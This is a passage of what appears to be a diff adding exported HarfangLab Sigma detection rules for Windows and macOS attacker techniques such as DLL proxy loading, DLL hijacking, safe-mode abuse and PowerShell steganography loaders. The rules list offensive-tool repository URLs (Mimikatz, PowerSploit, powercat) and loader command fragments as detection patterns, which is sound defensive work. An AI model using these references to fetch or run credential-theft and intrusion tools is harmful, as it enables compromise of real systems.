"rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.615245Z", + "creation_date": "2026-03-23T11:45:34.615249Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.615256Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", + "https://attack.mitre.org/techniques/T1218/" + ], + "name": "t1218_rasautou_execution_proxy.yml", + "content": "title: DLL Loaded via Rasautou.exe\nid: 1f5a2648-0258-4ffe-93b8-f4aa01a21d2c\ndescription: |\n Detects a malicious use of Rasautou.exe to load an arbitrary DLL file.\n Adversaries may use specific flags to load and execute arbitrary DLLs within Rasautou.exe and bypass security restrictions.\n It has to be noted that Microsoft has removed those parameters starting with Windows 10, therefore only older versions are impacted.\n It is recommended to check for suspicious activity from the executed process and its parents.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Rasautou/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2024/03/18\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Rasautou\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'rasdlui.exe'\n CommandLine|contains|all:\n - '-d'\n - '-p'\n\n condition: selection\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1f5a2648-0258-4ffe-93b8-f4aa01a21d2c", + "rule_name": "DLL Loaded via Rasautou.exe", + "rule_description": "Detects a malicious use of 
Rasautou.exe to load an arbitrary DLL file.\nAdversaries may use specific flags to load and execute arbitrary DLLs within Rasautou.exe and bypass security restrictions.\nIt has to be noted that Microsoft has removed those parameters starting with Windows 10, therefore only older versions are impacted.\nIt is recommended to check for suspicious activity from the executed process and its parents.\n", + "rule_creation_date": "2024-03-18", + "rule_modified_date": "2025-02-03", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1218" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1f8de2c5-e4de-49b9-8e1e-9753cb9c3f48", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "low", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.619770Z", + "creation_date": "2026-03-23T11:45:34.619773Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.619777Z", + "rule_level": "low", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1087/001/", + "https://attack.mitre.org/techniques/T1033/" + ], + "name": 
"t1033_w_macos.yml", + "content": "title: Current Logged In Users Discovered via W\nid: 1f8de2c5-e4de-49b9-8e1e-9753cb9c3f48\ndescription: |\n Detects the execution of the w command.\n Attackers may use it during the discovery phase of an attack to retrieve the list of users currently logged in and their last action on the system.\n It is recommended to check for other suspicious activity by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1087/001/\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/11/14\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.001\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/w'\n ParentImage|contains: '?'\n\n exclusion_globalprotect:\n GrandparentImage: '/Applications/GlobalProtect.app/Contents/MacOS/GlobalProtect'\n\n exclusion_kaspersky:\n ParentImage: '/Applications/Kaspersky Anti-Virus For Mac.app/Contents/MacOS/kavd.app/Contents/MacOS/kavd'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1f8de2c5-e4de-49b9-8e1e-9753cb9c3f48", + "rule_name": "Current Logged In Users Discovered via W", + "rule_description": "Detects the execution of the w command.\nAttackers may use it during the discovery phase of an attack to retrieve the list of users currently logged in and their last action on the system.\nIt is recommended to check for other suspicious activity by the parent process.\n", + "rule_creation_date": "2022-11-14", + "rule_modified_date": "2026-02-11", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.discovery" + ], + "rule_technique_tags": [ + "attack.t1033", + "attack.t1087.001" + ], + "warnings": null, + "errors": null, + 
"declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1f9140ad-7310-4971-817e-bc52afe6b553", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.087751Z", + "creation_date": "2026-03-23T11:45:34.087753Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.087757Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/" + ], + "name": "t1529_enable_safemode.yml", + "content": "title: Windows Safe-Mode Enabled\nid: 1f9140ad-7310-4971-817e-bc52afe6b553\ndescription: |\n Detects the activation of the Windows Safe-Mode.\n When restarted in Safe-Mode, many detection features are disabled.\n Attackers may enable Windows Safe-Mode to disable detection software and avoid detection.\n It is recommended to investigate the parent process to determine if this action was legitimate.\nreferences:\n - https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/\ndate: 2021/03/19\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - 
attack.t1529\n - attack.t1542\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n - Image|endswith: '\\bcdedit.exe'\n - OriginalFileName: 'bcdedit.exe'\n selection_2:\n CommandLine|contains|all:\n - '/set'\n - 'safeboot'\n selection_3:\n CommandLine|contains:\n - 'minimal'\n - 'network'\n\n condition: all of selection_*\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1f9140ad-7310-4971-817e-bc52afe6b553", + "rule_name": "Windows Safe-Mode Enabled", + "rule_description": "Detects the activation of the Windows Safe-Mode.\nWhen restarted in Safe-Mode, many detection features are disabled.\nAttackers may enable Windows Safe-Mode to disable detection software and avoid detection.\nIt is recommended to investigate the parent process to determine if this action was legitimate.\n", + "rule_creation_date": "2021-03-19", + "rule_modified_date": "2025-01-28", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1529", + "attack.t1542" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1fa76d65-e12e-4570-a4d7-bec1023044e3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + 
"backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.093760Z", + "creation_date": "2026-03-23T11:45:34.093762Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.093766Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/xforcered/WFH", + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_dfsdiag.yml", + "content": "title: DLL Hijacking via DfsDiag.exe\nid: 1fa76d65-e12e-4570-a4d7-bec1023044e3\ndescription: |\n Detects potential Windows DLL Hijacking via DfsDiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n 
selection:\n ProcessOriginalFileName: 'DfsDiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\netapi32.dll'\n - '\\resutils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1fa76d65-e12e-4570-a4d7-bec1023044e3", + "rule_name": "DLL Hijacking via DfsDiag.exe", + "rule_description": "Detects potential Windows DLL Hijacking via DfsDiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1fdb3367-1225-4b9e-99c5-2a202390b38b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + 
"alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.606938Z", + "creation_date": "2026-03-23T11:45:34.606941Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.606949Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://medium.com/@b.magnezi/malware-analysis-xworm-80b3bbb072fb", + "https://attack.mitre.org/techniques/T1059/001/", + "https://attack.mitre.org/techniques/T1027/003/" + ], + "name": "t1059_001_powershell_steganography_loader.yml", + "content": "title: PowerShell Steganography Loader\nid: 1fdb3367-1225-4b9e-99c5-2a202390b38b\ndescription: |\n Detects a specific PowerShell command-line used to download a JPG image containing a hidden base64 encoded .NET payload using a simple steganography technique.\n The .NET assembly then downloads the final malware payload, a RAT such as Remcos, subsequently injecting, and initiating its malicious operation within the victim’s system.\n This action is often related to a phishing campaign.\n It is recommended to investigate, with the help of the process tree, the context of this action to determine its legitimacy.\nreferences:\n - https://medium.com/@b.magnezi/malware-analysis-xworm-80b3bbb072fb\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1027/003/\ndate: 2023/09/29\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - 
attack.t1059.001\n - attack.defense_evasion\n - attack.t1027.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|contains|all:\n - '<>'\n - '<>'\n - '[System.Convert]::FromBase64String('\n - '[System.Reflection.Assembly]::Load('\n\n condition: selection\nlevel: critical\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1fdb3367-1225-4b9e-99c5-2a202390b38b", + "rule_name": "PowerShell Steganography Loader", + "rule_description": "Detects a specific PowerShell command-line used to download a JPG image containing a hidden base64 encoded .NET payload using a simple steganography technique.\nThe .NET assembly then downloads the final malware payload, a RAT such as Remcos, subsequently injecting, and initiating its malicious operation within the victim’s system.\nThis action is often related to a phishing campaign.\nIt is recommended to investigate, with the help of the process tree, the context of this action to determine its legitimacy.\n", + "rule_creation_date": "2023-09-29", + "rule_modified_date": "2025-02-03", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1027.003", + "attack.t1059.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2029c7d2-ce99-4765-bef4-8aa8277d9a50", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + 
"rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.092344Z", + "creation_date": "2026-03-23T11:45:34.092346Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.092351Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1059/001/" + ], + "name": "t1059_001_powershell_malicious_urls_script.yml", + "content": "title: URLs of Malicious Code Repository in PowerShell Script\nid: 2029c7d2-ce99-4765-bef4-8aa8277d9a50\ndescription: |\n Detects PowerShell scripts containing URLs that reference known malicious code or offensive tooling repositories.\n Threat actors frequently use public repositories and open-source PowerShell scripts in their attacks.\n It is recommended to investigate the repository being accessed, and examine any files or data that may have been downloaded. 
If your organization is not undergoing a security audit, this could indicate the initial stages of an attack or ongoing malicious activity.\nreferences:\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2021/06/24\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.FileDownload\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_1:\n PowershellCommand|contains:\n - '/raw.githubusercontent.com/'\n - 'LwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8A'\n - '8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvA'\n - 'vAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALw'\n - '/gist.githubusercontent.com/'\n - 'LwBnAGkAcwB0AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALw'\n - '8AZwBpAHMAdAAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8A'\n - 'vAGcAaQBzAHQALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvA'\n\n selection_2:\n PowershellCommand|contains:\n # https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/Find-Fruit.ps1\n # https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1\n - '/S3cur3Th1sSh1t/'\n # /S3cur3Th1sSh1t/ in UTF16-LE in base64 with 3 different offsets, for PowerShell command-lines\n - 'LwBTADMAYwB1AHIAMwBUAGgAMQBzAFMAaAAxAHQALw'\n - '8AUwAzAGMAdQByADMAVABoADEAcwBTAGgAMQB0AC8A'\n - 'vAFMAMwBjAHUAcgAzAFQAaAAxAHMAUwBoADEAdAAvA'\n # 'https://raw.githubusercontent.com/pwnieexpress/Metasploit-framework/master/exploits/powershell/powerdump.ps1\n - '/pwnieexpress/'\n - 'LwBwAHcAbgBpAGUAZQB4AHAAcgBlAHMAcwAvA'\n - '8AcAB3AG4AaQBlAGUAeABwAHIAZQBzAHMALw'\n - 'vAHAAdwBuAGkAZQBlAHgAcAByAGUAcwBzAC8A'\n # https://raw.githubusercontent.com/EmpireProject/Empire/master/module_source/credentials/Invoke-Mimikatz.ps1\n - 
'/EmpireProject/'\n - 'LwBFAG0AcABpAHIAZQBQAHIAbwBqAGUAYwB0AC8A'\n - '8ARQBtAHAAaQByAGUAUAByAG8AagBlAGMAdAAvA'\n - 'vAEUAbQBwAGkAcgBlAFAAcgBvAGoAZQBjAHQALw'\n # https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1\n - '/PowerSploit/'\n - 'LwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALw'\n - '8AUABvAHcAZQByAFMAcABsAG8AaQB0AC8A'\n - 'vAFAAbwB3AGUAcgBTAHAAbABvAGkAdAAvA'\n # https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1\n - '/clymb3r/'\n - 'LwBjAGwAeQBtAGIAMwByAC8A'\n - '8AYwBsAHkAbQBiADMAcgAvA'\n - 'vAGMAbAB5AG0AYgAzAHIALw'\n - '/Invoke-Mimikatz/'\n - 'LwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAvA'\n - '8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALw'\n - 'vAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC8A'\n # https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1\n - '/BloodHoundAD/'\n - 'LwBCAGwAbwBvAGQASABvAHUAbgBkAEEARAAvA'\n - '8AQgBsAG8AbwBkAEgAbwB1AG4AZABBAEQALw'\n - 'vAEIAbABvAG8AZABIAG8AdQBuAGQAQQBEAC8A'\n # https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1\n - '/Kevin-Robertson/'\n - 'LwBLAGUAdgBpAG4ALQBSAG8AYgBlAHIAdABzAG8AbgAvA'\n - '8ASwBlAHYAaQBuAC0AUgBvAGIAZQByAHQAcwBvAG4ALw'\n - 'vAEsAZQB2AGkAbgAtAFIAbwBiAGUAcgB0AHMAbwBuAC8A'\n # https://raw.githubusercontent.com/Veil-Framework/Veil-Pillage/master/data/PowerSploit/Invoke-Mimikatz.ps1\n - '/Veil-Framework/'\n - 'LwBWAGUAaQBsAC0ARgByAGEAbQBlAHcAbwByAGsALw'\n - '8AVgBlAGkAbAAtAEYAcgBhAG0AZQB3AG8AcgBrAC8A'\n - 'vAFYAZQBpAGwALQBGAHIAYQBtAGUAdwBvAHIAawAvA'\n # https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/Get-SPN/Get-SPN.psm1\n - '/nullbind/Powershellery/'\n - 'LwBuAHUAbABsAGIAaQBuAGQALwBQAG8AdwBlAHIAcwBoAGUAbABsAGUAcgB5AC8A'\n - '8AbgB1AGwAbABiAGkAbgBkAC8AUABvAHcAZQByAHMAaABlAGwAbABlAHIAeQAvA'\n - 'vAG4AdQBsAGwAYgBpAG4AZAAvAFAAbwB3AGUAcgBzAGgAZQBsAGwAZQByAHkALw'\n # 
https://gist.githubusercontent.com/shantanu561993/6483e524dc225a188de04465c8512909/raw/db219421ea911b820e9a484754f03a26fbfb9c27/AMSI_bypass_Reflection.ps1\n - '/shantanu561993/'\n - 'LwBzAGgAYQBuAHQAYQBuAHUANQA2ADEAOQA5ADMALw'\n - '8AcwBoAGEAbgB0AGEAbgB1ADUANgAxADkAOQAzAC8A'\n - 'vAHMAaABhAG4AdABhAG4AdQA1ADYAMQA5ADkAMwAvA'\n # https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\n - '/powercat/'\n - 'LwBwAG8AdwBlAHIAYwBhAHQALw'\n - '8AcABvAHcAZQByAGMAYQB0AC8A'\n - 'vAHAAbwB3AGUAcgBjAGEAdAAvA'\n # https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Start-Eidolon.ps1\n - '/FuzzySecurity/PowerShell-Suite/'\n - 'LwBGAHUAegB6AHkAUwBlAGMAdQByAGkAdAB5AC8AUABvAHcAZQByAFMAaABlAGwAbAAtAFMAdQBpAHQAZQAvA'\n - '8ARgB1AHoAegB5AFMAZQBjAHUAcgBpAHQAeQAvAFAAbwB3AGUAcgBTAGgAZQBsAGwALQBTAHUAaQB0AGUALw'\n - 'vAEYAdQB6AHoAeQBTAGUAYwB1AHIAaQB0AHkALwBQAG8AdwBlAHIAUwBoAGUAbABsAC0AUwB1AGkAdABlAC8A'\n # https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1\n - '/The-Viper-One/'\n - 'LwBUAGgAZQAtAFYAaQBwAGUAcgAtAE8AbgBlAC8A'\n - '8AVABoAGUALQBWAGkAcABlAHIALQBPAG4AZQAvA'\n - 'vAFQAaABlAC0AVgBpAHAAZQByAC0ATwBuAGUALw'\n # https://raw.githubusercontent.com/leoloobeek/LAPSToolkit/refs/heads/master/LAPSToolkit.ps1\n - '/leoloobeek/'\n - 'LwBsAGUAbwBsAG8AbwBiAGUAZQBrAC8A'\n - '8AbABlAG8AbABvAG8AYgBlAGUAawAvA'\n - 'vAGwAZQBvAGwAbwBvAGIAZQBlAGsALw'\n # https://raw.githubusercontent.com/sense-of-security/ADRecon/refs/heads/master/ADRecon.ps1\n - '/sense-of-security/'\n - 'LwBzAGUAbgBzAGUALQBvAGYALQBzAGUAYwB1AHIAaQB0AHkALw'\n - '8AcwBlAG4AcwBlAC0AbwBmAC0AcwBlAGMAdQByAGkAdAB5AC8A'\n - 'vAHMAZQBuAHMAZQAtAG8AZgAtAHMAZQBjAHUAcgBpAHQAeQAvA'\n # https://github.com/Friends-Security/ShadowHound/raw/refs/heads/main/ShadowHound-ADM.ps1\n # https://github.com/Friends-Security/ShadowHound/raw/refs/heads/main/ShadowHound-DS.ps1\n - '/Friends-Security/'\n - 'LwBGAHIAaQBlAG4AZABzAC0AUwBlAGMAdQByAGkAdAB5AC8A'\n - 
'8ARgByAGkAZQBuAGQAcwAtAFMAZQBjAHUAcgBpAHQAeQAvA'\n - 'vAEYAcgBpAGUAbgBkAHMALQBTAGUAYwB1AHIAaQB0AHkALw'\n # https://github.com/dafthack/GraphRunner\n # https://github.com/dafthack/MFASweep\n # https://github.com/dafthack/MailSniper\n - '/dafthack/'\n - 'LwBkAGEAZgB0AGgAYQBjAGsALw'\n - '8AZABhAGYAdABoAGEAYwBrAC8A'\n - 'vAGQAYQBmAHQAaABhAGMAawAvA'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2029c7d2-ce99-4765-bef4-8aa8277d9a50", + "rule_name": "URLs of Malicious Code Repository in PowerShell Script", + "rule_description": "Detects PowerShell scripts containing URLs that reference known malicious code or offensive tooling repositories.\nThreat actors frequently use public repositories and open-source PowerShell scripts in their attacks.\nIt is recommended to investigate the repository being accessed, and examine any files or data that may have been downloaded. If your organization is not undergoing a security audit, this could indicate the initial stages of an attack or ongoing malicious activity.\n", + "rule_creation_date": "2021-06-24", + "rule_modified_date": "2025-04-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1059.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2097d94f-4a7d-417e-8cb0-063a71e4cd4c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, 
+ "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.591189Z", + "creation_date": "2026-03-23T11:45:34.591192Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.591200Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://wietze.github.io/blog/save-the-environment-variables", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_scriptrunner.yml", + "content": "title: DLL Hijacking via ScriptRunner.exe\nid: 2097d94f-4a7d-417e-8cb0-063a71e4cd4c\ndescription: |\n Detects potential Windows DLL Hijacking via ScriptRunner.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ScriptRunner.exe'\n ProcessSignature: 'Microsoft 
